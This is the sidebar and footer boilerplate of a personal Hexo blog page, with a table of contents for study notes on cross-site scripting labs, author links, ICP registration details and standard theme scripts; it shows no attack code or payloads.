<span class="nav-text">Stored cross-site scripting</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Stored-XSS"><span class="nav-number">3.</span> <span class="nav-text">Stored XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-stored-cross-site-scripting"><span class="nav-number">3.1.</span> <span class="nav-text">What is stored cross-site scripting?</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Stored-XSS-into-HTML-context-with-nothing-encoded"><span class="nav-number">3.1.0.1.</span> <span class="nav-text">Lab: Stored XSS into HTML context with nothing encoded</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impact-of-stored-XSS-attacks"><span class="nav-number">3.2.</span> <span class="nav-text">Impact of stored XSS attacks</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stored-XSS-in-different-contexts"><span class="nav-number">3.3.</span> <span class="nav-text">Stored XSS in different contexts</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-to-find-and-test-for-stored-XSS-vulnerabilities"><span class="nav-number">3.4.</span> <span class="nav-text">How to find and test for stored XSS vulnerabilities</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM-based-cross-site-scripting"><span class="nav-number">3.5.</span> <span class="nav-text">DOM-based cross-site scripting</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DOM-based-XSS"><span class="nav-number">4.</span> <span class="nav-text">DOM-based XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-DOM-based-cross-site-scripting"><span class="nav-number">4.1.</span> <span class="nav-text">What is DOM-based cross-site scripting?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Which-sinks-can-lead-to-DOM-XSS-vulnerabilities"><span class="nav-number">4.2.</span> <span class="nav-text">Which sinks can lead to DOM-XSS vulnerabilities?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#What-can-XSS-be-used-for"><span class="nav-number">4.3.</span> <span class="nav-text">What can XSS be used for?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impact-of-XSS-vulnerabilities"><span class="nav-number">4.4.</span> <span class="nav-text">Impact of XSS vulnerabilities</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-to-find-and-test-for-XSS-vulnerabilities"><span class="nav-number">4.5.</span> <span class="nav-text">How to find and test for XSS vulnerabilities</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Content-security-policy"><span class="nav-number">4.6.</span> <span class="nav-text">Content security policy</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Content-security-policy-1"><span class="nav-number">5.</span> <span class="nav-text">Content security policy</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-CSP-content-security-policy"><span class="nav-number">5.1.</span> <span class="nav-text">What is CSP (content security policy)?</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exploiting-cross-site-scripting-vulnerabilities"><span class="nav-number">6.</span> <span class="nav-text">Exploiting cross-site scripting vulnerabilities</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-cross-site-scripting-to-steal-cookies"><span class="nav-number">6.1.</span> <span class="nav-text">Exploiting cross-site scripting to steal cookies</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Exploiting-cross-site-scripting-to-steal-cookies"><span class="nav-number">6.1.0.1.</span> <span class="nav-text">Lab: Exploiting cross-site scripting to steal cookies</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-cross-site-scripting-to-capture-passwords"><span class="nav-number">6.2.</span> <span class="nav-text">Exploiting cross-site scripting to capture passwords</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-cross-site-scripting-to-perform-CSRF"><span class="nav-number">6.3.</span> <span class="nav-text">Exploiting cross-site scripting to perform CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Exploiting-XSS-to-perform-CSRF"><span class="nav-number">6.3.0.1.</span> <span class="nav-text">Lab: Exploiting XSS to perform CSRF</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Dangling-markup-injection"><span class="nav-number">6.4.</span> <span class="nav-text">Dangling markup injection</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Dangling-markup-injection-1"><span class="nav-number">7.</span> <span class="nav-text">Dangling markup injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-dangling-markup-injection"><span class="nav-number">7.1.</span> <span class="nav-text">What is dangling markup injection?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-to-prevent-XSS-attacks"><span class="nav-number">7.2.</span> <span class="nav-text">How to prevent XSS attacks</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Common-questions-about-cross-site-scripting"><span class="nav-number">7.3.</span> <span class="nav-text">Common questions about cross-site scripting</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Cross-site-scripting-contexts"><span class="nav-number">8.</span> <span class="nav-text">Cross-site scripting contexts</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS-between-HTML-tags"><span class="nav-number">8.1.</span> <span class="nav-text">XSS between HTML tags</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Reflected-XSS-into-HTML-context-with-most-tags-and-attributes-blocked"><span class="nav-number">8.1.0.1.</span> <span class="nav-text">Lab: Reflected XSS into HTML context with most tags and attributes blocked</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Reflected-XSS-into-HTML-context-with-all-tags-blocked-except-custom-ones"><span class="nav-number">8.1.0.2.</span> <span class="nav-text">Lab: Reflected XSS into HTML context with all tags blocked except custom ones</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Reflected-XSS-with-some-SVG-markup-allowed"><span class="nav-number">8.1.0.3.</span> <span class="nav-text">Lab: Reflected XSS with some SVG markup allowed</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS-in-HTML-tag-attributes"><span class="nav-number">8.2.</span> <span class="nav-text">XSS in HTML tag attributes</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Reflected-XSS-into-attribute-with-angle-brackets-HTML-encoded"><span class="nav-number">8.2.0.1.</span> <span class="nav-text">Lab: Reflected XSS into attribute with angle brackets HTML-encoded</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Stored-XSS-into-anchor-href-attribute-with-double-quotes-HTML-encoded"><span class="nav-number">8.2.0.2.</span> <span class="nav-text">Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded</span></a></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yijian</p>
  <div class="site-description" itemprop="description">Just for fun :D</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">36</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/91Quin" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;91Quin" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:YijianCS@outlook.com" title="E-Mail → mailto:YijianCS@outlook.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">鲁ICP备2021011592号-1 </a>
      <img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403011809721.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=37020202001534" rel="noopener" target="_blank">鲁公网安备37020202001534号 </a>
  </div>

<div class="copyright">
  
  &copy; 2021 – 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yijian</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>











<script>
document.querySelectorAll('.pdfobject-container').forEach(element => {
  let url = element.dataset.target;
  let pdfOpenParams = {
    navpanes : 0,
    toolbar  : 0,
    statusbar: 0,
    pagemode : 'thumbs',
    view     : 'FitH'
  };
  let pdfOpenFragment = '#' + Object.entries(pdfOpenParams).map(([key, value]) => `${key}=${encodeURIComponent(value)}`).join('&');
  let fullURL = `/lib/pdf/web/viewer.html?file=${encodeURIComponent(url)}${pdfOpenFragment}`;

  if (NexT.utils.supportsPDFs()) {
    element.innerHTML = `<embed class="pdfobject" src="${url + pdfOpenFragment}" type="application/pdf" style="height: ${element.dataset.height};">`;
  } else {
    element.innerHTML = `<iframe src="${fullURL}" style="height: ${element.dataset.height};" frameborder="0"></iframe>`;
  }
});
</script>


<script>
if (document.querySelectorAll('pre.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8/dist/mermaid.min.js', () => {
    mermaid.initialize({
      theme    : 'default',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    });
  }, window.mermaid);
}
</script>


  

  

</body>
</html>
